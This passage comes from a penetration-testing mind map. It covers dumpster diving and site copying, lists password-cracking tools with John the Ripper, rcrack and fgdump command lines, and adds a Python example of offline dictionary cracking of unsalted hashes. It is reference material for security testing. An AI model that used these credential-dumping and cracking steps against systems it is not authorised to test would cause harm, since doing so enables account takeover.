28.4.2.5.1. Satellite Imagery
28.4.2.5.2. Building layouts
28.4.2.6. Other
28.5. Dumpster Diving
28.5.1. Rubbish Bins
28.5.2. Contract Waste Removal
28.5.3. eBay sales of ex-stock equipment, e.g. hard drives
28.6. Web Site copy
28.6.1. HTTrack
28.6.2. teleport pro
28.6.3. Black Widow
29. Password cracking
29.1. Rainbow crack
29.1.1. ophcrack
29.1.2. rainbow tables
29.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
29.2. Ophcrack
29.3. Cain & Abel
29.4. John the Ripper
29.4.1. ./unshadow passwd shadow > file_to_crack
29.4.2. ./john --single file_to_crack
29.4.3. ./john --wordlist=location_of_dictionary_file --rules file_to_crack
29.4.4. ./john --show file_to_crack
29.4.5. ./john --incremental=All file_to_crack
29.5. fgdump
29.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} e.g. fgdump.exe -u hacker -p hard_password -c -f target.txt
29.6. pwdump6
29.7. medusa
29.8. LCP
29.9. L0phtcrack (Note: - This tool was acquired by Symantec from @stake, and it was Symantec's policy not to ship it outside the USA and Canada)
29.9.1. Domain credentials
29.9.2. Sniffing
29.9.3. pwdump import
29.9.4. sam import
29.10. aiocracker
29.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
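Worked example (added here; it is not the aiocracker or John the Ripper source) covering the unshadow step in 29.4.1 and the unsalted md5/sha1/sha2 dictionary attack that 29.10.1 describes: identify the algorithm from digest length, apply a handful of JtR-style mangling rules to each dictionary word, and compare digests. All sample data (wordlist, digests, passwd/shadow lines) is constructed for the demo; the shadow hash is a placeholder string, not a real crypt(3) value, and the block does not attempt salted or crypt-format hashes, which is what John is for.

```python
"""Offline dictionary attack on unsalted md5/sha1/sha2 hex digests, plus an unshadow-style merge.
Added example. SAMPLE_* values below are constructed for the demo, not recovered from any system."""
import hashlib
from typing import Iterable, Iterator, List, Optional

HASH_BY_HEXLEN = {32: "md5", 40: "sha1", 64: "sha256", 96: "sha384", 128: "sha512"}


def identify(hexdigest: str) -> Optional[str]:
    """Guess the algorithm from digest length alone; only valid for unsalted hex digests."""
    h = hexdigest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return HASH_BY_HEXLEN.get(len(h))


def mangle(word: str) -> Iterator[str]:
    """A few JtR-style wordlist rules: case variants, common suffixes, simple leetspeak."""
    seen = set()
    for w in (word, word.lower(), word.capitalize(), word.upper()):
        for cand in (w, w + "1", w + "123", w + "!", w + "2009"):
            if cand not in seen:
                seen.add(cand)
                yield cand
    leet = word.lower().translate(str.maketrans("aeios", "43105"))
    if leet not in seen:
        yield leet


def crack(hexdigest: str, wordlist: Iterable[str], rules: bool = True) -> Optional[str]:
    """Return the plaintext whose digest matches, or None once the wordlist is exhausted."""
    algo = identify(hexdigest)
    if algo is None:
        raise ValueError("not a recognised unsalted hex digest")
    target = hexdigest.strip().lower()
    for line in wordlist:
        word = line.rstrip("\r\n")
        for cand in (mangle(word) if rules else (word,)):
            if hashlib.new(algo, cand.encode("utf-8")).hexdigest() == target:
                return cand
    return None


def unshadow(passwd_lines: Iterable[str], shadow_lines: Iterable[str]) -> List[str]:
    """Put each user's shadow hash into field 2 of its passwd line (what JtR's unshadow does)."""
    hashes = {}
    for line in shadow_lines:
        fields = line.rstrip("\r\n").split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_lines:
        fields = line.rstrip("\r\n").split(":")
        if len(fields) < 7:
            continue                          # not a passwd(5) record
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


# Constructed demo data: a tiny wordlist and digests of plaintexts the rules can reach.
SAMPLE_WORDLIST = ["winter", "summer", "password"]
SAMPLE_HASHES = {
    "md5": hashlib.md5(b"password").hexdigest(),          # plain dictionary word
    "sha256": hashlib.sha256(b"Summer2009").hexdigest(),  # needs capitalise + "2009" rule
    "sha1": hashlib.sha1(b"w1nt3r").hexdigest(),          # needs the leetspeak rule
}
SAMPLE_PASSWD = ["root:x:0:0:root:/root:/bin/bash",
                 "alice:x:1000:1000:Alice:/home/alice:/bin/bash"]
SAMPLE_SHADOW = ["root:!:18000:0:99999:7:::",
                 "alice:$6$constructed$notarealhash:18000:0:99999:7:::"]   # placeholder, not a real hash


def run_demo() -> dict:
    """Crack every sample digest; returns {algo: plaintext_or_None}."""
    return {algo: crack(h, SAMPLE_WORDLIST) for algo, h in SAMPLE_HASHES.items()}


if __name__ == "__main__":
    for algo, plain in run_demo().items():
        print(f"{algo:7s} {SAMPLE_HASHES[algo][:16]}...  ->  {plain}")
    print("\n".join(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)))
```

Length-based identification only works because these are raw unsalted digests: a 32-hex-character string could equally be an NTLM hash, so confirm where a hash came from before choosing the algorithm. The rules here are a small fixed set; John's rule language and incremental mode exist precisely because real wordlists need far more mangling than this.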